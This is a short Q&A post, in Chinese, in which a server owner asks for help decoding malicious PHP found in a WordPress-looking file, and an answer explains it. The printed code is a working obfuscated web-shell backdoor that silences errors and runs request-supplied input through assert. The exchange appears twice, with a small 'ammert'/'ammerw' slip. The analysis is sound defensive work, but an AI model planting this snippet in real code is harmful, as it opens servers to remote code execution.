我在我的服务器上发现了恶意 PHP 脚本
I found malicious PHP script on my server
我刚刚在我的服务器上的一个名为 wp-styles.php 的文件中发现了这个恶意 PHP 代码 - 请帮我解码它。
@error_reporting(0);
@ini_set("display_errors",0);
@ini_set("log_errors",0);
@ini_set("error_log",0);
$my_str = "ammerw";
$my_str = str_replace("m", "s", $my_str); $my_str = str_replace("w", "t", $my_str);
array_map($my_str, $_REQUEST\["0107e00d68f62ad87fbe5399c1300762"\]);
我认为你必须深入挖掘一下。如您所见,它关闭了任何错误报告。字符串 "ammert" 将转换为 "assert"。然后 array_map 使用这个字符串作为回调函数,并将存储在 $_REQUEST["0107e00d68f62ad87fbe5399c1300762"] 中的值作为参数传递。
如果这个值是一个字符串,assert 将 运行 这段代码!
因此,您必须使用上面的键检查 $_REQUEST 中存储的值。
这可能非常危险,具体取决于超全局变量 $_REQUEST 中的代码。并请检查,何时调用此隐藏脚本。
希望对您有所帮助。
我刚刚在我的服务器上的一个名为 wp-styles.php 的文件中发现了这个恶意 PHP 代码 - 请帮我解码它。
@error_reporting(0);
@ini_set("display_errors",0);
@ini_set("log_errors",0);
@ini_set("error_log",0);
$my_str = "ammerw";
$my_str = str_replace("m", "s", $my_str); $my_str = str_replace("w", "t", $my_str);
array_map($my_str, $_REQUEST\["0107e00d68f62ad87fbe5399c1300762"\]);
我认为你必须深入挖掘一下。如您所见,它关闭了任何错误报告。字符串 "ammert" 将转换为 "assert"。然后 array_map 使用这个字符串作为回调函数,并将存储在 $_REQUEST["0107e00d68f62ad87fbe5399c1300762"] 中的值作为参数传递。 如果这个值是一个字符串,assert 将 运行 这段代码! 因此,您必须使用上面的键检查 $_REQUEST 中存储的值。 这可能非常危险,具体取决于超全局变量 $_REQUEST 中的代码。并请检查,何时调用此隐藏脚本。
希望对您有所帮助。